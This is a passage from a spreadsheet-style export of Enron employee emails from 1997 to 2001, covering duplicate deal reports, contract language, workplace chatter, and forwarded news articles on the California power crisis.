duplicate deals.  This started yesterday and we contacted the appropriate _x000D_
books to kill the duplicate deal.  Yesterday, there were a total of eight _x000D_
deals duplicating, so far today there are six.  They have narrowed down the _x000D_
problem and Mike Swaim and Oscar Rivera think it should be resolved this _x000D_
afternoon.  _x000D_
_x000D_
Meanwhile, Oscar is running a query that will let us know the duplicate _x000D_
deals.  He will run this throughout the day and I will e-mail you the deals.  _x000D_
Listed below in Bold is the duplicate deals from today (two are from late _x000D_
last night).  I have placed the risk book next to the deals.  Please forward _x000D_
this to the appropriate people in your group.  I was not sure who runs the _x000D_
Singapore book, if London could let me know I would appreciate it._x000D_
_x000D_
I will keep you updated on the progress.  Sorry for any inconvenience this _x000D_
may be causing.  Feel free to call me if you would like more information._x000D_
_x000D_
Thanks,_x000D_
Dawn_x000D_
3-9353_x000D_
---------------------- Forwarded by Dawn C Kenne/HOU/ECT on 04/03/2001 10:18 _x000D_
AM ---------------------------_x000D_
From: Oscar Rivera/ENRON@enronXgate on 04/03/2001 10:15 AM_x000D_
To: Dawn C Kenne/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: duplicate deals_x000D_
_x000D_
Dawn, _x000D_
This is the list of duplicate deals. The last 6 on the list are new._x000D_
_x000D_
TAGGDeal EOL Deal CREATED_DTM_x000D_
V08631.1 1071187 4/2/2001 8:50:16 AM_x000D_
V08706.1 1071472 4/2/2001 8:57:41 AM_x000D_
V08946.1 1072217 4/2/2001 9:20:41 AM_x000D_
V10071.1 1074401 4/2/2001 1:01:55 PM_x000D_
V10070.1 1074402 4/2/2001 1:01:58 PM_x000D_
V10056.1 1074392 4/2/2001 1:01:20 PM_x000D_
V10085.1 1074425 4/2/2001 1:02:58 PM_x000D_
V10092.1 1074428 4/2/2001 1:03:11 PM_x000D_
V11230.1 1075175 4/2/2001 10:57:17 PM  Singapore_x000D_
V11231.1 1075176 4/2/2001 11:27:31 PM  Singapore_x000D_
V11722.1 1077766 4/3/2001 8:53:37 AM  East New York _x000D_
V11724.1 1077768 4/3/2001 8:53:37 AM  G-Daily-Est _x000D_
V11720.1 1077772 4/3/2001 8:53:44 AM  WTI-GW-NXC2  _x000D_
V11732.1 1077776 4/3/2001 8:53:55 AM  G-Daily-Est _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 09:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Revised TC language if  EPMI is Buyer in ERCOT across DC tie</t>
  </si>
  <si>
    <t xml:space="preserve">___________________x000D_
_x000D_
I have discussed with Doug Gilbert-Smith the transmission contingent language _x000D_
e-mailed to you on 4-27-01 and am communicating the revised text below for _x000D_
insertion into those written confirmations of EPMI's purchases in ERCOT being _x000D_
supplied across a DC tie, when designated by the ERCOT traders to require _x000D_
this insert .  This text is only for those specific transactions which the _x000D_
ERCOT traders indicate.    _x000D_
_x000D_
"Transmission Contingent: DC Tie.  If Seller is unable to secure the _x000D_
transmission required for this Transaction on a DC tie line across the ERCOT _x000D_
system border ("DC tie"),  or transmission on such DC tie is curtailed in a _x000D_
manner affecting Seller's delivery hereunder, then Seller at its election _x000D_
shall not be required to deliver the affected portion of the Energy and, in _x000D_
the event of that election by Seller, neither party shall be liable to the _x000D_
other hereunder for failure to deliver/receive such Energy.  No other _x000D_
transmission contingency is designated by the parties to pertain to this _x000D_
Transaction." </t>
  </si>
  <si>
    <t>Thu, 6 Mar 1997 01:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Jeff Skilling testifying at Murkowski workshop -- Workshop will_x000D_
 run from 9:30 a.m. to 12:00, in room 216 of the Hart Senate Office_x000D_
 Building.</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Came back with Skilling on company plane.</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 12:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'nancy.sellers@robertmondavi.com', 'jeff_dasovich@enron.com', 'psellers@haas.berkeley.edu', 'psellers@pacbell.net'})</t>
  </si>
  <si>
    <t>Re: Cameron's b-day</t>
  </si>
  <si>
    <t>All,_x000D_
_x000D_
I've made reservations for 12 at 6:30 at Woodward Gardens. They supposedly_x000D_
opened a back room, so now have room for more people. Cameron still wants me_x000D_
to look into Liberty Cafe, but anyway, we have reservations somewhere, at_x000D_
least._x000D_
_x000D_
Also, Nancy and Eldon, Cameron said to me that she totally understands if_x000D_
you guys don't want to come into the city just for that. Of course, we want_x000D_
you there! It's just something to consider if you think it'll be too much,_x000D_
what with the Dome and all, and then turning right around to come into the_x000D_
city for dinner..._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Scott_x000D_
__________________________________________________________________x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com</t>
  </si>
  <si>
    <t>Tue, 11 Jan 2000 01:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'david.cox@enron.com'})</t>
  </si>
  <si>
    <t>Congratulations</t>
  </si>
  <si>
    <t>Dave,_x000D_
_x000D_
Congratulations. Well deserved._x000D_
_x000D_
Vince</t>
  </si>
  <si>
    <t>Tue, 13 Mar 2001 01:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>#547841</t>
  </si>
  <si>
    <t>This deal is in as flowing every day, hours 7 -22, including Sundays.  Is _x000D_
this correct?_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Thu, 26 Oct 2000 17:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rory@carmelnet.com'})</t>
  </si>
  <si>
    <t>Hello from san francisco</t>
  </si>
  <si>
    <t>Blind copied to a select group of folks:_x000D_
_x000D_
only in san francisco - see attached j.peg_x000D_
_x000D_
----------------------------------------------------------------------------_x000D_
----_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Body~art.jpg</t>
  </si>
  <si>
    <t>Wed, 5 Apr 2000 04:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'trish3kids@aol.com'})</t>
  </si>
  <si>
    <t>MS150</t>
  </si>
  <si>
    <t>Patti,_x000D_
_x000D_
It was good to see you and Mike last night. _x000D_
_x000D_
I wanted to follow up on the MS150 - I can assure you that you will do fine _x000D_
without training (assuming, of course, that you have a bike).  I did it that _x000D_
way twice before with no major complications.  Given your running, you will _x000D_
do better.  It really is a lot of fun._x000D_
_x000D_
Sherri is checking to see if you can join the Enron team.  We will be the _x000D_
first team off on Saturday morning and the team has good facilities (tents, _x000D_
food, etc.) that improve the experience.  GO FOR IT!!_x000D_
_x000D_
Jeff_x000D_
_x000D_
PS - hi, Patti - this is Sherri.  I did check with our team captain and she _x000D_
said you could join our team so long as you do so by Friday.  She is going to _x000D_
e-mail all the necessary forms and information to me, which I will forward to _x000D_
you today if you are interested.  Let us know!  Hope all is well...</t>
  </si>
  <si>
    <t>Tue, 2 May 2000 02:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: 1. Your Thur./Fri. Austin Trip; 2. Presentation of My_x000D_
 Risk-Management Optimization Model; 3. Enron On-Line</t>
  </si>
  <si>
    <t>Vince,_x000D_
_x000D_
&gt;I shall definitely attend you presentation at Power 2000._x000D_
Thanks, I appreciate it._x000D_
_x000D_
&gt;I shall ask about a guest accounton EOL. Typically, such an account allows_x000D_
&gt;an outside user to take a look at the system, but I don't think the traders_x000D_
&gt;will allow_x000D_
&gt;systematic access to the price data over a long period of time by a third_x000D_
&gt;party._x000D_
I quite understand, and will appreciate the ability to use the system while_x000D_
the permission is applicable._x000D_
_x000D_
&gt;Would you like to meet with me, Alex, Helyette for dinner Tuesday?_x000D_
I would be delighted to join you, Alex and Helyette for dinner Tue.  When_x000D_
that info is available, please advise when and where._x000D_
_x000D_
Look forward to seeing you Tue.  Best,_x000D_
Ehud_x000D_
_x000D_
==============================================_x000D_
     Ehud I. Ronn_x000D_
     Department of Finance_x000D_
     College and Graduate School of Business_x000D_
     University of Texas at Austin_x000D_
     Austin, TX. 78712-1179_x000D_
     Voice:  (512) 471-5853_x000D_
      FAX:   (512) 471-5073_x000D_
      Internet:  eronn@mail.utexas.edu_x000D_
=================================================</t>
  </si>
  <si>
    <t>Wed, 20 Dec 2000 10:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>THE agreement</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to clean up after Blue Girl.  Can you tell me again who signs for _x000D_
LJM so that I can get signature?  Who does their legal work?  _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 12/20/2000 06:58 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
12/15/2000 01:22 PM_x000D_
To: Lynn.DeKrey@swpc.com_x000D_
cc:  _x000D_
_x000D_
Subject: THE agreement_x000D_
_x000D_
With high hopes that this is the FINAL final version, I'm attaching what I _x000D_
believe to be the execution copy.  Some things have been cleaned up, and _x000D_
Brownsville has been added to paragraph 5.  I'm going to start collecting _x000D_
signatures._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 22:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'carla.hoffman@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'matt.motley@enron.com', 'tom.alonso@enron.com', 'mike.swerzbin@enron.com', 'sean.crandall@enron.com', 'mark.guzman@enron.com', 'tim.belden@enron.com', 'mark.fischer@enron.com', 'jesse.bryson@enron.com', 'phillip.platter@enron.com', 'jeff.richter@enron.com', 'robert.badeer@enron.com', 'diana.scholtes@enron.com'})</t>
  </si>
  <si>
    <t>DJ Edison To Call For End To Calif Elec Dereg Wed -Sources, DJ Ca_x000D_
 lif PUC Proposes To Let Utilities Out of CalPX</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Carla Hoffman/PDX/ECT on 12/13/2000 06:29 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Pergher, Gunther" &lt;Gunther.Pergher@dowjones.com&gt;                      _x000D_
     12/13/2000 06:24 AM_x000D_
	_x000D_
_x000D_
To: undisclosed-recipients:;_x000D_
cc:  _x000D_
Subject: DJ Edison To Call For End To Calif Elec Dereg Wed -Sources, DJ Ca _x000D_
lif PUC Proposes To Let Utilities Out of CalPX_x000D_
_x000D_
_x000D_
13:16 GMT 13 December 2000 =DJ Edison To Call For End To Calif Elec Dereg_x000D_
Wed -Sources_x000D_
(This article was originally published Tuesday)_x000D_
_x000D_
   By Jason Leopold_x000D_
   Of DOW JONES NEWSWIRES_x000D_
_x000D_
LOS ANGELES (Dow Jones)--Edison International (EIX), saying the current_x000D_
state of California's power markets threatens the company with bankruptcy,_x000D_
will call Wednesday for an end to California's four-year experiment with_x000D_
deregulation, sources familiar with the issue told Dow Jones Newswires._x000D_
John Bryson, chief executive of Edison International, is expected to_x000D_
announce that the company's regulated utility unit, Southern California_x000D_
Edison, won't be able to recover more than $3 billion in losses related to_x000D_
power purchases and continue serving its retail customers unless the state's_x000D_
deregulated market structure is scrapped._x000D_
In a move tantamount to a call for reregulation, Edison will propose to_x000D_
break ground on new power plants within 90 days and re-enter the_x000D_
power-generation business Southern California Edison was required to exit_x000D_
under the state's landmark 1996 deregulation law, the sources said._x000D_
Edison plans to follow the announcement by filing a request with state_x000D_
regulators to increase retail electricity rates by as much as 20%, the_x000D_
sources said, even though regulators rejected Edison's request for a rate_x000D_
increase of 10% last week._x000D_
The utility has lined up the support of some state lawmakers for the broader_x000D_
proposal, which would require action by the state legislature, the sources_x000D_
said._x000D_
Southern California Edison, with 4.2 million customers, is one of the_x000D_
country's largest electric utilities. Edison was the first of the state's_x000D_
utilities to sign on to the deregulation effort and, as it says on its Web_x000D_
site, "played a central role in the restructuring of the electric industry_x000D_
in California."_x000D_
Among the concessions won by utilities in 1996 is the rate freeze, which_x000D_
they demanded to help them recover costs related to deregulation but which_x000D_
is now producing huge losses._x000D_
Edison's current losses stem from an imbalance between the soaring prices it_x000D_
must pay to purchase power on the wholesale markets and the fixed rate at_x000D_
which it can sell power to its customers._x000D_
About half of those losses are offset the utility's own power sales_x000D_
revenues, which are accounted for separately and used to pay down_x000D_
deregulation-related debt. Rising power costs have produced a surplus in_x000D_
that account. Edison wouldn't reveal the current size of the surplus, but_x000D_
said previously that the California Power Exchange paid the utility $1.3_x000D_
billion over its generating costs for power through the end of September, at_x000D_
a time when its power-purchase losses were $2.4 billion._x000D_
_x000D_
   Power-Purchase Losses Mounting_x000D_
_x000D_
The net losses continue to mount. California's wholesale power prices_x000D_
hovered at record levels all summer and spiked even higher in the past two_x000D_
weeks, as colder weather arrived in the Northwest at a time when much of_x000D_
California's power supply was down for maintenance._x000D_
The price of power for delivery Wednesday in California hit an average of_x000D_
$1,182 a megawatt-hour Tuesday, up from $250 a megawatt-hour a week ago, the_x000D_
result of high demand and a decision by California's wholesale market_x000D_
operator to lift its cap on prices._x000D_
The rate Southern California Edison can charge its retail customers,_x000D_
however, is fixed at $66/MWh._x000D_
Last week, Merrill Lynch &amp; Co. (MER) downgraded its ratings for Edison_x000D_
International and PG&amp;E Corp. (PCG), the parent of California's other major_x000D_
utility, Pacific Gas &amp; Electric, to neutral, saying the utilities may be_x000D_
forced to file for bankruptcy if the state doesn't allow them to raise their_x000D_
retail rates._x000D_
A Morgan Stanley Dean Witter (MWD) analyst drew the same conclusion Monday,_x000D_
also cutting his rating to neutral._x000D_
Edison to this point has kept its power-purchase losses off its earnings_x000D_
statement, in hopes that a political or regulatory solution will allow them_x000D_
to be collected later._x000D_
The California Public Utilities Commission put the hope of such a solution_x000D_
further out of reach last week, however, when it ruled against rate_x000D_
increases sought by Edison and PG&amp;E._x000D_
Credit rating agency Fitch Inc. on Monday lowered its ratings for Edison_x000D_
International and Southern California Edison's senior unsecured debt to the_x000D_
A-minus level, citing "increased liquidity pressure" and uncertainty about_x000D_
the utilities' ability to recover the costs of their power purchases. The_x000D_
agency downgraded Edison International, the parent, because half its_x000D_
consolidated cash flow is provided by Southern California Edison._x000D_
Edison - which sources said plans to remain in the retail electricity_x000D_
business - said late last week that it has secured a $1 billion line of_x000D_
credit and expects to have enough cash on hand to continue to pay for_x000D_
wholesale electricity for the next several months._x000D_
California paid more than $1 billion for power last week, sources said. Some_x000D_
of that, however, was paid to Southern California Edison, which still_x000D_
generates about 2,800 megawatts of power in the state._x000D_
Shares in Edison International have fallen 21% over the past three weeks._x000D_
They closed Wednesday at $18.56, down $0.06._x000D_
-By Jason Leopold, Dow Jones Newswires; 323-658-3874;_x000D_
jason.leopold@dowjones.com_x000D_
(Mark Golden contributed to this article.)_x000D_
(END) Dow Jones Newswires 13-12-00_x000D_
1316GMT Copyright (c) 2000, Dow Jones &amp; Company Inc_x000D_
13:16 GMT 13 December 2000 DJ Calif PUC Proposes To Let Utilities Out of_x000D_
CalPX_x000D_
(This article was originally published Tuesday)_x000D_
NEW YORK (Dow Jones)--The California Public Utilities Commission has_x000D_
proposed letting the state's three investor-owned utilities out of the_x000D_
requirement that they purchase their power through the California Power_x000D_
Exchange._x000D_
The proposed ruling, written by Commissioner Carl Wood, would direct_x000D_
"jurisdictional utilities to serve their native load, to the extent_x000D_
possible, with their retained generation and power purchase contracts,_x000D_
rather than through a bidding process."_x000D_
Commissioners will take a final vote on the ruling Dec. 21, but the three_x000D_
Democrats on the five-member commission - including Wood - usually agree on_x000D_
proposed rulings before the rulings are put on the voting agenda, which was_x000D_
posted Tuesday._x000D_
The change is in line with the U.S. Federal Energy Regulatory Commission's_x000D_
proposed ruling Nov. 1, which will get a final vote Friday, to remove the_x000D_
mandate that the utilities buy their power from the state-chartered_x000D_
California Power Exchange._x000D_
The PX has been a lynchpin of the state's electric utility deregulation,_x000D_
passed in 1996. It was to be a clearing house for a multitude of bulk power_x000D_
producers and sellers, and its market prices were to be passed on to_x000D_
remaining customers of the utilities after the deregulation transition to_x000D_
free markets._x000D_
But Sempra Energy (SRE) unit San Diego Gas &amp; Electric Co, which emerged from_x000D_
the transition period a year ago, was passing on CalPX prices to customer_x000D_
until this summer, when electricity prices tripled and the PUC fixed SDG&amp;E_x000D_
rates again._x000D_
-By Mark Golden, Dow Jones Newswires; 201-938-4604; mark.golden@dowjones.com_x000D_
_x000D_
   (END) Dow Jones Newswires  13-12-00_x000D_
1316GMT Copyright (c) 2000, Dow Jones &amp; Company Inc_x000D_
_x000D_
_x000D_
G_nther A. Pergher_x000D_
Senior Analyst_x000D_
Dow Jones &amp; Company Inc._x000D_
Tel.  609.520.7067_x000D_
Fax. 609.452.3531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_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Feb 2001 07:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Ms. Lambert</t>
  </si>
  <si>
    <t xml:space="preserve">They must not let her take time off anymore.  It is quite disruptive to all _x000D_
our business to have her our of the office, don't you think?!!_x000D_
_x000D_
_x000D_
_x000D_
	Bob Bowen_x000D_
	02/27/2001 12:29 PM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Ms. Lambert_x000D_
_x000D_
I'm worried - is the above still working at Enron or has she not been out on _x000D_
holiday for awhile?_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Feb 2001 07:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Give up</t>
  </si>
  <si>
    <t xml:space="preserve">Relative to most of the questions I answer all day, your questions don't even _x000D_
count as stupid!!  _x000D_
_x000D_
Later,_x000D_
Robin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Becky Pitre_x000D_
02/28/2001 03:37 PM_x000D_
To: Robin Rodrigue/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Give up  _x000D_
_x000D_
No.  Vegetables and gatorade.  B_x000D_
PS How many stupid questions do you get every day?  And does this count as _x000D_
one or two?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Robin Rodrigue_x000D_
02/28/2001 01:16 PM_x000D_
To: Becky Pitre/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Give up  _x000D_
_x000D_
I'm giving up being nice.  And answering stupid questions.  You should give _x000D_
up having yogurt and gatorade for lunch.  Did you have something good today?_x000D_
_x000D_
_x000D_
_x000D_
Becky Pitre_x000D_
02/28/2001 01:11 PM_x000D_
To: Robin Rodrigue/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Give up_x000D_
_x000D_
What are you giving up for lent?  _x000D_
What should I give up for lent?_x000D_
B_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 23 Oct 1999 04:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Affiliate Setoff Language</t>
  </si>
  <si>
    <t xml:space="preserve">Did you ever hear back from the power people?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Carol St Clair_x000D_
09/20/99 11:45 AM_x000D_
To: Elizabeth Sager/HOU/ECT@ECT, Leslie Hansen/HOU/ECT@ECT_x000D_
cc: Mark - ECT Legal Taylor/HOU/ECT@ECT, Shari Stack/HOU/ECT@ECT, Sara _x000D_
Shackleton/HOU/ECT@ECT _x000D_
Subject: Affiliate Setoff Language_x000D_
_x000D_
Elizabeth and Leslie:_x000D_
Enclosed is the setoff langauge that we put into our financial master _x000D_
agreements.  Most of our counterparties agree to this, but from our "utility" _x000D_
counterparties we consistently get the comment that from a regulatory _x000D_
standpoint, they cannot agree to the "Affiliate" lnaguage that is in here _x000D_
which I have highlighted.   Does this sound plausible to you and if so, why?  _x000D_
Are there some utilility counterparties that could agree to this?_x000D_
Carol_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2001 01:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: CACs Forms</t>
  </si>
  <si>
    <t xml:space="preserve">Louise:_x000D_
_x000D_
Is Enron ready for this?  I think it is a good suggestion for the most _x000D_
significant deals.  It is really positive in that it would force dealmakers _x000D_
to pay more attention to what the contracts provide.  I am not sure it makes _x000D_
sense to follow this procedure for every deal that is dashed.  Let's talk _x000D_
about what are the objectives.  Great question! _x000D_
_x000D_
Mark_x000D_
_x000D_
_x000D_
_x000D_
	Louise Kitchen_x000D_
	03/28/2001 04:27 PM_x000D_
		 _x000D_
		 To: Mark E Haedicke/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: CACs Forms_x000D_
_x000D_
Response?_x000D_
---------------------- Forwarded by Louise Kitchen/HOU/ECT on 03/28/2001 _x000D_
04:27 PM ---------------------------_x000D_
_x000D_
_x000D_
Louise Kitchen_x000D_
03/21/2001 12:35 PM_x000D_
To: Mark E Haedicke/HOU/ECT@ECT_x000D_
cc: John J Lavorato/Enron@EnronXGate _x000D_
_x000D_
Subject: CACs Forms_x000D_
_x000D_
We have spoken about this before, the issue is that Enron Americas has no _x000D_
approval mechanism for contracts. Neither does any other group but that is _x000D_
not my problem.  I have spent too much time reading DASH forms which really _x000D_
do not provide full authorization._x000D_
_x000D_
There are two suggestions that I would like to be implemented:_x000D_
_x000D_
(i) DASH forms need to include all of the contracts which are to be signed _x000D_
under the deal.  So if a DASH is signed then this authorizes all of the _x000D_
contracts to be signed in the deal.  Any contracts which are not included _x000D_
need to go through the process outlined below._x000D_
_x000D_
(ii) All contracts need a Contract Approval Form attached and Enron's legal _x000D_
team cannot initial any contract until this form has been completed (ie _x000D_
signed) by the following Enron staff._x000D_
_x000D_
Trader/Originator _________________________________x000D_
Head of Group (VP or above)_______________________x000D_
Credit___________________________________________x000D_
Legal___________________________________________x000D_
Tech Services (where applicable)___________________x000D_
Commercial Support (where applicable)______________x000D_
_x000D_
A database of all completed contracts on behalf of Enron Americas needs to be _x000D_
maintained by Legal._x000D_
_x000D_
Thoughts please?_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Nov 2001 12:34:04 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'marie.heard@enron.com', 'tana.jones@enron.com'})</t>
  </si>
  <si>
    <t>Master Netting Agreements - Canadian Security Registrations</t>
  </si>
  <si>
    <t>Marie/Tana - would you be able to help me out again on the looking up the agreements that we have with the following entities.  Also to the extent that we have agreements please provide me with the address from the notice provision._x000D_
_x000D_
_x000D_
Reliant Energy Services, Inc. (also formerly known as Noram Energy Services, Inc. and Noram Energy Corp.) _x000D_
_x000D_
BP Corporation North America Inc._x000D_
BP Energy Company_x000D_
Vastar Resources, Inc. _x000D_
BP Canada Energy Marketing Corp._x000D_
Cibola Energy Services Corporation_x000D_
IGI Resources, Inc._x000D_
BP Oil Supply Company_x000D_
BP Products North America Inc._x000D_
BP North American Petroleum (a division of BP Products North America Inc.)_x000D_
BP Amoco Chemical Company_x000D_
BP Chemicals Inc._x000D_
Atlantic Richfield Company_x000D_
Amoco Production Company _x000D_
_x000D_
I you could get back to me sometime in the next few of days I would appreciate it._x000D_
_x000D_
Thanks,_x000D_
Chris</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 07:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: exhibit</t>
  </si>
  <si>
    <t xml:space="preserve">Depends on how much time you give me._x000D_
_x000D_
_x000D_
From: Reagan Rorschach/ENRON@enronXgate on 04/10/2001 02:25 PM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: RE: exhibit_x000D_
_x000D_
Can you get the Form of Parent Guaranty??_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Mann, Kay  _x000D_
Sent: Tuesday, April 10, 2001 2:16 PM_x000D_
To: Rorschach, Reagan_x000D_
Subject: exhibit_x000D_
_x000D_
 &lt;&lt; File: EXHIBIT A.doc &gt;&gt; _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 03:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>State PUC Takes On High Cost Of Energy Regulators foresee more rate_x000D_
 increases</t>
  </si>
  <si>
    <t xml:space="preserve">State PUC Takes On High Cost Of Energy _x000D_
Regulators foresee more rate increases _x000D_
Robert Salladay, Lynda Gledhill, Chronicle Sacramento Bureau_x000D_
Monday, March 12, 2001 _x000D_
,2001 San Francisco Chronicle _x000D_
URL: _x000D_
http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2001/03/12/M_x000D_
N227831.DTL _x000D_
Sacramento -- Starting this week, state regulators will begin debating how _x000D_
much is enough when it comes to asking Californians to shoulder the _x000D_
electricity crisis by paying higher utility rates. _x000D_
Right now, there doesn't appear to be enough money to go around. The state _x000D_
government and the utilities have racked up monumental bills because of _x000D_
California's flawed deregulation system. And even with recent rate increases, _x000D_
not enough cash is coming in to pay off the debts and buy power. _x000D_
Over the next three weeks, deciding how that money gets divvied up to pay the _x000D_
state's debt will be one of the toughest jobs of the year. State Treasurer _x000D_
Philip Angelides said the state Public Utilities Commission would be _x000D_
essentially filling a shoe box with debts and commitments during a series of _x000D_
meetings and workshops this month, and it's going to be a tight fit without _x000D_
raising power bills even more. _x000D_
"The rubber hits the road in the next few weeks at the PUC," Angelides said. _x000D_
"There is a box that has to be filled up, and a no-rate-increase scenario is _x000D_
putting all of these things into this box. It'll be tough work." _x000D_
Under the law, the PUC has the power to essentially determine how much profit _x000D_
the utilities can make. It's a set formula, designed to give the power _x000D_
companies a comfortable margin and to keep power bills reasonable for _x000D_
consumers. _x000D_
But with the 1996 deregulation an utter failure in California, there are many _x000D_
more demands on that money. The utilities claim to be $14 billion in debt. _x000D_
The state of California is spending $45 million a day to buy power. Taxpayers _x000D_
have spent $3.2 billion so far, and the PUC recently said utility customers _x000D_
would be required to pay that money back. _x000D_
Then there is the $10 billion in bonds the state is selling to buy long- term _x000D_
contracts for power. Angelides said the PUC also must guarantee him an _x000D_
estimated $1.3 billion a year from consumers to pay off the bonds, which his _x000D_
office expects to begin selling by the end of May. _x000D_
That money could end up running out by September, or June 2002 under the most _x000D_
optimistic prediction, Angelides said. That could mean California would have _x000D_
to borrow even more money beyond the $10 billion -- money that consumers will _x000D_
most likely have to pay back through their bills. _x000D_
Gov. Gray Davis has said repeatedly that it is his "hope and expectation" _x000D_
that rates will not increase. But he has been criticized for seeming to say _x000D_
that a temporary rate increase approved in January will be made permanent and _x000D_
that a 10 percent rate decrease imposed when deregulation was implemented _x000D_
will be lifted next year. _x000D_
"If I wanted to raise rates, I could have solved this in 20 minutes," Davis _x000D_
said last month. _x000D_
But others are convinced now that rates will go up even more than the 19 _x000D_
percent. And PUC Commissioner Richard Bilas said he thinks the rates should _x000D_
go up before the summer to encourage conservation. _x000D_
'FUNDAMENTALS DON'T CHANGE' _x000D_
"It doesn't matter what is done in terms of rhetoric, legislation, ideas or _x000D_
proposals at the commission -- the fundamentals don't change," said Bilas, a _x000D_
Republican. "There is not enough supply and too much demand. The only _x000D_
function on the demand side is a rate increase. Otherwise, people won't stop _x000D_
using electricity." _x000D_
Since the state is buying roughly 30 percent of the power used by the _x000D_
utilities -- and at the highest prices so far -- the state should be entitled _x000D_
to an equivalent share of the money coming in from consumers. _x000D_
"If we're going to issue bonds, we must have first (crack at) that money," _x000D_
Angelides said. His office believes that "a failure to (issue bonds) in the _x000D_
appropriate manner will directly and negatively impact consumer rates." _x000D_
Angelides also needs a commitment from the PUC over how the state will get _x000D_
repaid for the money it's spending to buy emergency power the utilities _x000D_
cannot afford to purchase. _x000D_
Bilas said the PUC, which will take up some of these issues at their meeting _x000D_
on Thursday, would have to face reality soon. _x000D_
'IT'S A BAND-AID' _x000D_
"It's the direction we have been moving in," he said. "We're having to face _x000D_
up to fact that there needs to be rate increase. What is being done isn't a _x000D_
solution to the problem -- it's a Band-Aid." _x000D_
The utilities, among others, are eyeing the money as well for their _x000D_
significant costs. They have accumulated massive debts that need to be _x000D_
repaid, and have investors to satisfy. _x000D_
Also looking for a slice of the pie are the alternative energy producers -- _x000D_
including wind and solar producers -- who depend on payments from the _x000D_
utilities to buy the natural gas they need to operate. _x000D_
These facilities account for nearly a third of the energy produced in _x000D_
California, and any scenario that has the state getting through the summer _x000D_
without significant blackouts requires full operation. _x000D_
"What everybody has told me is this summer is going to be murder, because we _x000D_
don't have enough," state Senate President pro tem John Burton, D-San _x000D_
Francisco, said recently. _x000D_
Three things are occurring that are designed to make sure the money going out _x000D_
to pay for debts and power is slightly less than the money coming in from _x000D_
consumers: _x000D_
Small alternative energy providers are expected to start getting lower _x000D_
payments. _x000D_
Utilities, as part of a state rescue plan still being negotiated, will be _x000D_
required to sell the electricity they generate themselves at cost. _x000D_
The state is signing long-term contracts for its share of power, which _x000D_
reduces demands on ratepayers. _x000D_
The idea is to leave enough headroom that will pay back the state for what it _x000D_
is spending over a long period of time. _x000D_
Angelides said the difference -- that headroom -- should be returned to the _x000D_
state to pay off the debts it incurred from the long-term contracts financed _x000D_
with the bond money and to buy emergency power. _x000D_
STATE WANTS ITS SHARE_x000D_
"We stepped into the breach here," Angelides said. "We're entitled to a fair _x000D_
slice of the pie." _x000D_
Angelides said the new rate schedule, which the PUC is determining this _x000D_
month, should not be used to pay back utilities for any of their debts from _x000D_
before Jan. 17. That's when the state started buying power for the utilities. _x000D_
So far, the utilities are not asking for their past debts to be repaid. Some _x000D_
other financing for those must be developed, such as selling thousands of _x000D_
miles of electrical transmission lines to raise billions of dollars. _x000D_
But there may not be much headroom left to pay off all the other debts. _x000D_
Chris Danforth with the Office of Ratepayer Advocates, which is designed to _x000D_
make sure consumers get a good deal out of the PUC, said the future payments _x000D_
